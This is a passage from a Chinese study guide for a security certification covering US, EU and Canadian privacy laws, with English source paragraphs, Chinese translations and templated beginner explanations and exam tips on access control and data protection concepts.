不合理的延迟后进行,且不得迟于发现泄露后的 60 天。 数据泄露通知法 HITECH的数据泄露通知规则具有独特性,因为它是一项联邦法律, 强制要求通知受影响的个人。 除了对医疗记录的这一要求外,各州的数 据泄露通知要求差异很大。 2002年,加利福尼亚州通过了参议院法案SB 1386,成为首个立即向 个人披露已知或疑似个人身份信息泄露的州。 这包括个人姓名的未加 密副本,以及以下任何信息: 社会安全号码 驾照号码 州身份证号码 账户号码、信用卡或借记卡号码,以及任何允许访问个人财务 账户所需的验证码、访问码或密码。 在SB 1386通过后的几年里,其他州也通过了类似加利福尼亚州数据 泄露通知法的法律。 2018年,在SB 1386通过16年后,阿拉巴马州 和南达科他州成为最后两个通过数据泄露通知法的州。 有关各州数据泄露通知法的完整列表,请参见 www.ncsl.org/research/telecommunications-and-information-technology/security-breach-notification-laws.aspx。

1998年儿童在线隐私保护法 2000年4月,联邦《儿童在线隐私保护法》 (COPPA)的条款在美国正式生效。 COPPA对面向儿童或明知收集儿童 信息的网站提出了一系列要求:

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

身份:身份是主体在系统中的标识。

日志:日志记录系统和用户活动,用于监控、审计和调查。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 299 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

身份管理题要区分识别、认证、授权、审计。

日志要保护完整性、时间同步和访问控制。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
身份 身份是主体在系统中的标识。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 28 / PDF P300

授权、审计与问责

认证后还要授权,之后靠审计和日志追责。

教材原文段落

Websites must have a privacy notice that clearly states the types of information they collect and what it's used for, including whether any information is disclosed to third parties. The privacy notice must also include contact information for the operators of the site. Parents must be provided with the opportunity to review any information collected from their children and permanently delete it from the site's records. Parents must give verifiable consent to the collection of information about children younger than the age of 13 prior to any such collection. Exceptions in the law allow websites to collect minimal information solely for the purpose of obtaining such parental consent.

Gramm–Leach–Bliley Act of 1999 Until the Gramm–Leach–Bliley Act (GLBA) became law in 1999, there were strict governmental barriers between financial institutions. Banks, insurance companies, and credit providers were severely limited in the services they could provide and the information they could share with each other. GLBA somewhat relaxed the regulations concerning the services each organization could provide. When Congress passed this law, it realized that this increased latitude could have far-reaching privacy implications.

Because of this concern, it included a number of limitations on the types of information that could be exchanged even among subsidiaries of the same corporation and required financial institutions to provide written privacy policies to all their customers. USA PATRIOT Act of 2001 Congress passed the Uniting and Strengthening America by Providing Appropriate Tools Required to Intercept and Obstruct Terrorism (USA PATRIOT) Act of 2001 in direct response to the September 11, 2001, terrorist attacks in New York City and Washington, DC.

The PATRIOT Act greatly broadened the powers of law enforcement organizations and intelligence agencies across a number of areas, including when monitoring electronic communications. One of the major changes prompted by the PATRIOT Act revolves around the way government agencies obtain wiretapping authorizations. Previously, police could obtain warrants for only one circuit at a time, after proving that the circuit was used by someone subject to monitoring. Provisions of the PATRIOT Act allow authorities to obtain a blanket authorization for a person and then monitor all communications to or from that person under the single warrant.

中文直译 / 整理

网站必须提供隐私声明,明确说明其收集的信息类型及其用途,包括是 否向第三方披露任何信息。 隐私声明还必须包含网站运营者的联系方式。 必须向家长提供审查从其子女处收集的任何信息并将其从网站记录中 永久删除的机会。 在收集13岁以下儿童的信息之前,必须获得家长的可验证同意。 法律中 的例外情况允许网站为获取此类家长同意而仅收集最少的信息。 1999年格拉姆‑里奇‑比利雷法案 在1999年《格拉姆‑里奇‑比利雷法案》 (GLBA)成为法律之前,金融机构之间存在严格的政治壁垒。 银行、保险 公司和信贷机构在所能提供的服务以及彼此之间可以共享的信息方面受到 严重限制。 GLBA在一定程度上放宽了有关各机构可提供服务的监管规定。 当国会通过这项法律时,它意识到这种放宽可能带来深远的隐私影响。 由 于这一担忧,该法案对同一公司子公司之间可以交换的信息类型设定了多 项限制,并要求金融机构向所有客户提供书面的隐私政策。 2001年美国爱国者法案 国会通过了《通过提供适当工具以拦截和阻碍恐怖 主义来联合和加强美国》(简称2001年美国爱国者法案),直接回应了 2001年9月11日发生在纽约市和华盛顿特区的恐怖袭击事件。

爱国者法案 在多个领域极大扩展了执法机构和情报机构的权力,包括监控电子通信时。 《爱国者法案》引发的主要变化之一,涉及政府机构获取窃听授权的方式。 此前,警方在证明某条线路被监控对象使用后,每次只能获得一条线路的 搜查令。 《爱国者法案》的条款允许当局为某人获得一揽子授权,并在单 一搜查令下监控该人所有通信内容。

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:认证后还要授权,之后靠审计和日志追责。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

授权:授权是认证之后决定你能访问什么、能做什么。

政策:政策是高层原则,说明必须遵守什么。

恢复点目标 RPO:RPO 是最多能接受丢失多少时间范围的数据。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“授权、审计与问责”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

认证成功不等于什么都能做;权限仍要单独授权。

Policy 高层、强制、稳定;Procedure 具体步骤。

RPO 问数据:最多丢到哪个时间点。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
授权 授权是认证之后决定你能访问什么、能做什么。
政策 政策是高层原则,说明必须遵守什么。
恢复点目标 RPO RPO 是最多能接受丢失多少时间范围的数据。
学习单元 29 / PDF P301

政策、标准、程序、指南

高层原则、最低要求、操作步骤、建议做法要分清。

教材原文段落

Another major change is in the way the government deals with Internet service providers (ISPs). Under the terms of the PATRIOT Act, ISPs may voluntarily provide the government with a large range of information. The PATRIOT Act also allows the government to obtain detailed information on user activity through the use of a subpoena (as opposed to a wiretap). Finally, the USA PATRIOT Act amends the Computer Fraud and Abuse Act (yes, another set of amendments!) to provide more severe penalties for national security related criminal acts. The PATRIOT Act provides for jail terms of up to 20 years and once again expands the coverage of the CFAA. The PATRIOT Act has a complex legislative history.

Many of the key provisions of the PATRIOT Act expired in 2015 when Congress failed to pass a renewal bill. However, Congress later passed the Uniting and Strengthening America by Fulfilling Rights and Ensuring Effective Discipline Over Monitoring (USA FREEDOM) Act in June 2015, which restored key provisions of the PATRIOT Act. The provisions expired again in March 2020 and were once again renewed. Clarifying Lawful Overseas Use of Data (CLOUD) Act The Clarifying Lawful Overseas Use of Data (CLOUD) Act was enacted in 2018, establishing procedures that govern access to data held by technology companies across national borders.

This piece of legislation was introduced as a way to improve law enforcement's ability to gather digital evidence stored on servers regardless of where the servers are located, provided that the company is based within the United States or subject to U.S. jurisdiction. Key aspects of the CLOUD Act include: It authorizes the U.S. government to enter into bilateral agreements with other countries to provide reciprocal rights to data relevant to criminal investigations and proceedings. U.S.-based technology companies can receive and must comply with lawful orders for data disclosure issued by foreign governments with which the U.S. has an executive agreement, bypassing the need for U.S.

government intervention if certain conditions and human rights standards are met.

中文直译 / 整理

另一项重大变化是政府对待互联网服务提供商(ISP)的方式。 根据《爱 国者法案》的规定,ISP可自愿向政府提供大量信息。 《爱国者法案》还 允许政府通过传票(而非窃听)获取用户活动的详细信息。 最后,《美国爱国者法案》修订了《计算机欺诈与滥用法案》(是的, 又是一系列修订! ),以加强对与国家安全相关的犯罪行为的处罚。 《爱国者法案》规定最高可判处20年监禁,并再次扩大了《计算机欺诈 与滥用法案》的适用范围。 《爱国者法案》具有复杂的立法历史。 《爱国者法案》的许多关键条款 在2015年因国会未能通过续期法案而失效。 然而,国会于2015年6月通过 了《通过履行权利和确保有效监督监控来联合与强化美国》(USA FREEDOM法案),恢复了《爱国者法案》的关键条款。 这些条款在 2020年3月再次失效,并又一次获得续期。 澄清合法海外使用数据(CLOUD)法案《澄清合法海外使用数据( CLOUD)法案》于2018年颁布,确立了规范技术公司跨境数据访问的程 序。 该立法旨在提高执法机构获取存储在服务器上的数字证据的能力, 无论服务器位于何处,只要该公司位于美国境内或受美国管辖即可。

《云法案》的关键方面包括: 它授权美国政府与其他国家缔结双边协议,以相互赋予与刑事调查和 诉讼相关的数据访问权。 基于美国的技术公司可以接收并必须遵守由与美国签订行政协议的外 国政府发布的合法数据披露命令,只要满足某些条件和人权标准,即 可无需美国政府介入。

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:高层原则、最低要求、操作步骤、建议做法要分清。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

授权:授权是认证之后决定你能访问什么、能做什么。

标准:标准给出必须满足的最低要求。

程序:程序是一步一步怎么做。

日志:日志记录系统和用户活动,用于监控、审计和调查。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“政策、标准、程序、指南”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

认证成功不等于什么都能做;权限仍要单独授权。

Minimum level、mandatory requirement 常对应 standard。

Step-by-step、SOP 常对应 procedure。

日志要保护完整性、时间同步和访问控制。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
授权 授权是认证之后决定你能访问什么、能做什么。
标准 标准给出必须满足的最低要求。
程序 程序是一步一步怎么做。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 30 / PDF P302

安全控制框架:用成熟框架组织安全

框架帮助组织系统化管理控制,而不是想到哪做到哪。

教材原文段落

It clarifies that U.S. law enforcement can compel U.S.-based service providers via warrant or subpoena to disclose electronic data in their possession, custody, or control, even if the data is stored on servers located outside the United States. The act provides mechanisms for technology companies to challenge or seek a modification to the data requests if they believe the order violates the rights of the customer or the laws of a foreign jurisdiction.

Family Educational Rights and Privacy Act The Family Educational Rights and Privacy Act (FERPA) is another specialized privacy bill that affects any educational institution that accepts any form of funding from the federal government (the vast majority of schools). It grants certain privacy rights to students 18 or older (or younger than 18 and attending a postsecondary institution) and the parents of minor students. Specific FERPA protections include the following: Parents/students have the right to inspect any educational records maintained by the institution on the student.

Parents/students have the right to request correction of records they think are erroneous and the right to include a statement in the records contesting anything that is not corrected. Schools may not release personal information from student records without written consent, except under certain circumstances. Identity Theft and Assumption Deterrence Act In 1998, the president signed the Identity Theft and Assumption Deterrence Act into law. In the past, the only legal victims of identity theft were the creditors who were defrauded. This law was extended by the Identity Theft Penalty Enhancement Act in 2004.

Together, these laws make identity theft a crime against the person whose identity was stolen and provide severe criminal penalties (up to a 15-year prison term and/or substantial fines) for anyone found guilty of violating this law.

中文直译 / 整理

它明确指出,美国执法机构可以通过搜查令或传票强制基于美国的服 务提供商披露其拥有、保管或控制的电子数据,即使这些数据存储在 美国境外的服务器上。 该法案为科技公司提供了机制,以便在认为该命令侵犯了客户权 利或外国司法管辖区法律时,挑战或申请修改数据请求。 家庭教育权利和隐私法案 家庭教育权利和隐私法案(FERPA)是另 一项专门的隐私法案,适用于接受任何形式联邦资金的教育机构(绝 大多数学校)。 该法案赋予18岁或以上(或未满18岁但就读于高等教 育机构)的学生以及未成年学生的父母某些隐私权。 FERPA的具体 保护措施包括以下内容: 父母/学生有权查阅学校保存的关于学生的任何教育记录。 父母/学生有权要求更正他们认为有误的记录,并有权在未被更正的内 容旁附上异议声明。 学校不得在未经书面同意的情况下泄露学生记录中的个人信息,但某些 特殊情况除外。 身份盗窃和欺诈阻止法1998年,总统将《身份盗窃和欺诈阻止法》签 署为法律。 过去,身份盗窃的唯一合法受害者是被欺诈的债权人。 该法 律于2004年通过《身份盗窃惩罚增强法》得到扩展。

这些法律共同将 身份盗窃定为对身份被盗者的犯罪行为,并对任何被认定违反本法的人 施以严厉的刑事处罚(最高可判处15年监禁和/或巨额罚款)。

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:框架帮助组织系统化管理控制,而不是想到哪做到哪。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

ISO:ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。

身份:身份是主体在系统中的标识。

日志:日志记录系统和用户活动,用于监控、审计和调查。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“安全控制框架:用成熟框架组织安全”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

ISO 偏标准和管理体系。

身份管理题要区分识别、认证、授权、审计。

日志要保护完整性、时间同步和访问控制。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
ISO ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。
身份 身份是主体在系统中的标识。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 31 / PDF P303

第 303 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

Privacy in the Workplace One of the authors of this book had an interesting conversation with a relative who works in an office environment. At a family gathering, the author's relative casually mentioned a story he had read online about a local company that had fired several employees for abusing their Internet privileges. He was shocked and couldn't believe that a company would violate their employees' right to privacy. As you've read in this chapter, the U.S. court system has long upheld the traditional right to privacy as an extension of basic constitutional rights.

However, the courts have maintained that a key element of this right is that privacy should be guaranteed only when there is a “reasonable expectation of privacy.” For example, if you mail a letter to someone in a sealed envelope, you may reasonably expect that it will be delivered without being read along the way—you have a reasonable expectation of privacy. On the other hand, if you send your message on a postcard, you do so with the awareness that one or more people might read your note before it arrives at the other end—you do not have a reasonable expectation of privacy.

Recent court rulings have found that employees do not have a reasonable expectation of privacy while using employer-owned communications equipment in the workplace. If you send a message using an employer's computer, Internet connection, telephone, or other communications device, your employer can monitor it as a routine business procedure. That said, if you're planning to monitor the communications of your employees, you should take reasonable precautions to ensure that there is no implied expectation of privacy.

Here are some common measures to consider: Clauses in employment contracts that state the employee has no expectation of privacy while using corporate equipment Similar written statements in corporate acceptable use and privacy policies

中文直译 / 整理

工作场所的隐私 本书的一位作者曾与一位在办公室环境中工作的亲属进行过一次有趣的对 话。 在一次家庭聚会上,这位作者的亲属随意提到了他在线读到的一个故 事:一家本地公司因员工滥用互联网特权而解雇了数名员工。 他感到震惊, 无法相信一家公司会侵犯员工的隐私权。 正如您在本章中所读到的,美国法院系统长期以来一直将隐私权作为基本 宪法权利的延伸予以维护。 然而,法院认为,这一权利的关键要素在于, 只有在存在“合理隐私期望”时,隐私才应得到保障。 例如,如果您将一 封信件装入密封信封寄出,您可以合理期望它在传递过程中不会被阅读—— 您拥有合理的隐私期望。 另一方面,如果您通过明信片发送信息,则您应 意识到,在信息到达收件人之前,可能有一人或多人会阅读您的内容—— 您不具有合理的隐私期望。 最近的法院裁决发现,员工在使用雇主提供的通信设备进行工作时,并不 具有合理的隐私期望。 如果您使用雇主的计算机、互联网连接、电话或其 他通信设备发送信息,雇主可以将其作为常规业务程序进行监控。 话虽如此,如果您计划监控员工的通信,您应采取合理措施,确保不存在 隐含的隐私预期。

以下是一些值得考虑的常见措施: 雇佣合同中的条款,声明员工在使用公司设备时没有隐私预期 企业可接受使用和隐私政策中类似的书面声明

小白解释

场景先行:机房断电,业务部门问多久能恢复、最多会丢多少数据。BCP/DRP 不是背缩写,而是把业务能承受的中断时间和数据损失说清楚。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:只做备份但没测试,真正灾难时可能恢复不了。

你作为负责人可以这样想:先做业务影响分析,再定 RTO/RPO,最后设计备份、冗余和演练。

本页术语用人话说:

政策:政策是高层原则,说明必须遵守什么。

程序:程序是一步一步怎么做。

恢复点目标 RPO:RPO 是最多能接受丢失多少时间范围的数据。

常见误区:RTO 问时间,RPO 问数据;这两个不要混。

读完后用一句话复述:如果我是业务连续性负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 303 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务连续性负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

Policy 高层、强制、稳定;Procedure 具体步骤。

Step-by-step、SOP 常对应 procedure。

RPO 问数据:最多丢到哪个时间点。

排除法提醒:RTO 问时间,RPO 问数据;这两个不要混。

本页术语拆解
政策 政策是高层原则,说明必须遵守什么。
程序 程序是一步一步怎么做。
恢复点目标 RPO RPO 是最多能接受丢失多少时间范围的数据。
学习单元 32 / PDF P304

第 304 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

Logon banners warning that all communications are subject to monitoring Warning labels on computers and telephones warning of monitoring As with many of the issues discussed in this chapter, it's a good idea to consult with your legal counsel before undertaking any communicationsmonitoring efforts. European Union Privacy Law The European Union (EU) has served as a leading force in the world of information privacy, passing a series of regulations designed to protect individual privacy rights. These laws function in a comprehensive manner, applying to almost all individually identifiable information, unlike U.S.

privacy laws, which generally apply to specific industries or categories of information. European Union General Data Protection Regulation The European Union passed a comprehensive law covering the protection of personal information in 2016. The General Data Protection Regulation (GDPR) went into effect in 2018 and replaced the earlier Data Protection Directive (DPD). The main purpose of this law is to provide a single, harmonized law that covers data throughout the European Union, bolstering the personal privacy protections originally provided by the DPD. A major difference between the GDPR and the data protection directive is the widened scope of the regulation.

The new law applies to all organizations that collect data from EU residents or process that information on behalf of someone who collects it. Importantly, the law even applies to organizations that are not based in the EU, if they collect information about EU residents. The ability of the EU to enforce this law globally remains an open question. The key provisions of the GDPR include the following: Lawfulness, fairness, and transparency says that you must have a legal basis for processing personal information, you must not process data in a manner that is misleading or detrimental to data subjects, and you must be open and honest about data processing activities.

中文直译 / 整理

登录横幅警告所有通信均受监控 计算机和电话上警告监控的警示标签 与本章讨论的许多问题一样,在开展任何通信监控工作之前,最好咨询您 的法律顾问。 欧盟隐私法 欧洲联盟(EU)一直是信息隐私领域的领军力量,通过了一系列旨在保护 个人隐私权的法规。 这些法律以全面的方式运作,适用于几乎所有可识别个 人身份的信息,而美国的隐私法律通常仅适用于特定行业或信息类别。 欧盟通用数据保护条例 欧洲联盟于2016年通过了一项涵盖个人信息保护的综合性法律。 《通用数据保 护条例》(GDPR)于2018年生效,并取代了早期的《数据保护指令》( DPD)。 该法律的主要目的是提供一项统一且协调的法律,覆盖整个欧洲联盟 的数据,强化DPD最初提供的个人隐私保护。 GDPR与数据保护指令之间的一个主要区别是法规范围的扩大。 新法律适用于 所有从欧盟居民处收集数据或代表收集数据者处理该信息的组织。 重要的是, 即使组织并非位于欧盟,只要其收集有关欧盟居民的信息,该法律同样适用。 欧盟在全球范围内执行该法律的能力仍是一个悬而未决的问题。

GDPR的关键条款包括以下内容: 合法性、公平性和透明性规定,您处理个人信息必须有合法依据,不得以 误导或损害数据主体的方式处理数据,并且必须对数据处理活动保持开放 和诚实。

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

身份:身份是主体在系统中的标识。

日志:日志记录系统和用户活动,用于监控、审计和调查。

恢复点目标 RPO:RPO 是最多能接受丢失多少时间范围的数据。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 304 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

身份管理题要区分识别、认证、授权、审计。

日志要保护完整性、时间同步和访问控制。

RPO 问数据:最多丢到哪个时间点。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
身份 身份是主体在系统中的标识。
日志 日志记录系统和用户活动,用于监控、审计和调查。
恢复点目标 RPO RPO 是最多能接受丢失多少时间范围的数据。
学习单元 33 / PDF P305

机密性:让该看的人看,不该看的人看不到

机密性重点是防泄露,同时不能妨碍授权访问。

教材原文段落

Purpose limitation says that you must clearly document and disclose the purposes for which you collect data and limit your activity to disclosed purposes. Data minimization says that you must ensure that the data you process is adequate for your stated purpose and limited to what you actually need for that purpose. Accuracy says that the data you collect, create, or maintain is correct and not misleading, that you maintain updated records, and that you correct or erase inaccurate data.

Storage limitation says that you keep data only for as long as it is needed to fulfill a legitimate, disclosed purpose and that you comply with the “right to be forgotten” that allows individuals to require companies to delete their information if it is no longer needed. Integrity and confidentiality says that you must have appropriate security, integrity and confidentiality controls in place to protect data. Accountability says that you must take responsibility for actions you take with protected data and that the data controller must be able to demonstrate compliance. Cross-Border Information Sharing GDPR is of particular concern when transferring information across international borders.

Organizations needing to conduct transfers between their subsidiaries have two options available for complying with EU regulations: Organizations may adopt a set of standard contractual clauses (SCCs) that have been approved for use in situations where information is being transferred outside of the EU. Those clauses are found on the European Commission website and are available for integration into contracts. Organizations may adopt binding corporate rules (BCRs) that regulate data transfers between internal units of the same firm.

This is a very time-consuming process—the rules must be approved by every EU member nation where they will be used, so typically this path is only adopted by very large organizations. In the past, the European Union and the United States operated a safe harbor agreement called Privacy Shield. Organizations were able to certify their

中文直译 / 整理

目的限制规定,您必须明确记录并披露收集数据的目的,并将活动限制在 已披露的目的范围内。 数据最小化规定,您必须确保所处理的数据足以满足您的声明目的,且仅 限于实现该目的实际所需的数据。 准确性规定,您收集、创建或维护的数据必须正确且不具误导性,您应保 持记录的更新,并纠正或删除不准确的数据。 存储限制规定,您仅在为实现合法且已披露的目的所需的时间内保留数据, 并遵守“被遗忘权”,该权利允许个人在数据不再需要时要求企业删除其 信息。 完整性和机密性规定,您必须采取适当的安全、完整性和机密性控制措施 以保护数据。 问责性规定,您必须对您处理受保护数据的行为负责,且数据控制者必须 能够证明其合规性。 跨境信息共享 在跨国传输信息时,GDPR 是特别值得关注的问题。 需要在其子公司之间进 行数据传输的组织有两项合规选项可供选择: 组织可以采用一套经批准用于欧盟以外传输信息情形的标准合同条款( SCCs)。 这些条款可在欧盟委员会网站上找到,并可集成到合同中。 组织可以采用具有约束力的公司规则(BCRs),以规范同一企业内部 单位之间的数据传输。

这是一个非常耗时的过程——这些规则必须获得 将在其境内使用的每一个欧盟成员国的批准,因此通常只有大型组织才 会选择此路径。 过去,欧盟和美国实施了一项名为《隐私盾》的安全港协议。 组织可以通过独立评 估机构认证其

小白解释

场景先行:想象公司有一个客户订单系统:客户资料被别人看到是机密性问题,订单金额被偷偷改是完整性问题,系统打不开是可用性问题。教材这一页就是教你把事故先翻译成安全目标。

这一页真正想让你理解的是:机密性重点是防泄露,同时不能妨碍授权访问。

把它放进公司里看,关键不是背定义,而是判断:把泄露、篡改、宕机混在一起,就会选错控制措施。

你作为负责人可以这样想:先判断事故破坏了 CIA 哪一项,再选择对应控制:防泄露、防篡改、保可用。

本页术语用人话说:

机密性:机密性让该看的人能看,不该看的人看不到。

完整性:完整性保证数据没有被未授权修改,并且仍然正确可信。

认证:认证是验证“你是不是你声称的那个人”。

问责性:问责性要求能把行为绑定到具体主体。

常见误区:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

读完后用一句话复述:如果我是业务系统负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“机密性:让该看的人看,不该看的人看不到”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务系统负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

加密、访问控制、分类、培训都常用于保护机密性。

哈希、数字签名、变更控制、输入校验常对应完整性。

密码、令牌、生物特征、多因素认证都服务认证。

问责依赖识别、认证、授权、审计和记账共同工作。

Minimum level、mandatory requirement 常对应 standard。

排除法提醒:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

本页术语拆解
机密性 机密性让该看的人能看,不该看的人看不到。
完整性 完整性保证数据没有被未授权修改,并且仍然正确可信。
认证 认证是验证“你是不是你声称的那个人”。
问责性 问责性要求能把行为绑定到具体主体。
标准 标准给出必须满足的最低要求。
恢复点目标 RPO RPO 是最多能接受丢失多少时间范围的数据。
学习单元 34 / PDF P306

完整性:数据要正确、可信、未被乱改

完整性不只是防黑客篡改,也包括防授权用户误操作。

教材原文段落

compliance with privacy practices through independent assessors and, if awarded the privacy shield, were permitted to transfer information. However, a 2020 ruling by the Court of Justice of the European Union (CJEU) in a case called Schrems II declared the EU/US Privacy Shield invalid. Currently, companies may not rely on the Privacy Shield and must use either standard contractual clauses or binding corporate rules. At the time this book went to press, efforts were underway to implement a new safe harbor program designed to meet EU requirements. In some cases, conflicts arise between laws of different nations.

For example, electronic discovery rules in the United States might require the production of evidence that is protected under GDPR. In those cases, privacy professionals should consult with attorneys to identify an appropriate course of action. The Asia-Pacific Economic Cooperation (APEC) publishes a privacy framework that incorporates many standard privacy practices, such as preventing harm, notice, collection limitation, use of personal information, choice, integrity of personal information, security safeguards, access and correction, and accountability. This framework is used to promote the smooth cross-border flow of information between APEC member nations.

Canadian Privacy Law Canadian law affects the processing of personal information related to Canadian residents. Chief among these, the Personal Information Protection and Electronic Documents Act (PIPEDA) is a national-level law that restricts how commercial businesses may collect, use, and disclose personal information. Generally speaking, PIPEDA covers information about an individual that is identifiable to that individual. The Canadian government provides the following examples of information covered by PIPEDA: Race, national, or ethnic origin Religion

中文直译 / 整理

隐私合规性,若获得隐私盾认证,则被允许传输信息。 然而,2020年,欧洲联盟法院(CJEU)在名为“Schrems II”的案件中裁定 欧盟/美国隐私盾牌无效。 目前,公司不得再依赖隐私盾牌,而必须使用标准合 同条款或具有约束力的公司规则。 本书付印时,正在努力实施一项新的安全港 计划,以满足欧盟的要求。 在某些情况下,不同国家的法律之间会产生冲突。 例如,美国的电子取证规则 可能要求提供受GDPR保护的证据。 在这些情况下,隐私专业人士应咨询律师, 以确定适当的行动方案。 亚太经济合作组织(APEC)发布了一项隐私框架,其中纳入了许多 标准隐私实践,例如防止损害、通知、收集限制、个人信息使用、选择权、 个人信息完整性、安全保护、访问与更正以及问责制。 该框架用于促进 APEC成员国之间信息的顺畅跨境流动。 加拿大隐私法 加拿大法律影响与加拿大居民相关的个人信息处理。 其中最重要的是个人信息 保护与电子文件法案(PIPEDA),这是一项国家级法律,限制商业企业收集、 使用和披露个人信息的方式。 一般来说,PIPEDA涵盖可识别个人身份的有关个人的信息。

加拿大政府提 供了以下受PIPEDA覆盖的信息示例: 种族、国籍或民族出身 宗教

小白解释

场景先行:想象公司有一个客户订单系统:客户资料被别人看到是机密性问题,订单金额被偷偷改是完整性问题,系统打不开是可用性问题。教材这一页就是教你把事故先翻译成安全目标。

这一页真正想让你理解的是:完整性不只是防黑客篡改,也包括防授权用户误操作。

把它放进公司里看,关键不是背定义,而是判断:把泄露、篡改、宕机混在一起,就会选错控制措施。

你作为负责人可以这样想:先判断事故破坏了 CIA 哪一项,再选择对应控制:防泄露、防篡改、保可用。

本页术语用人话说:

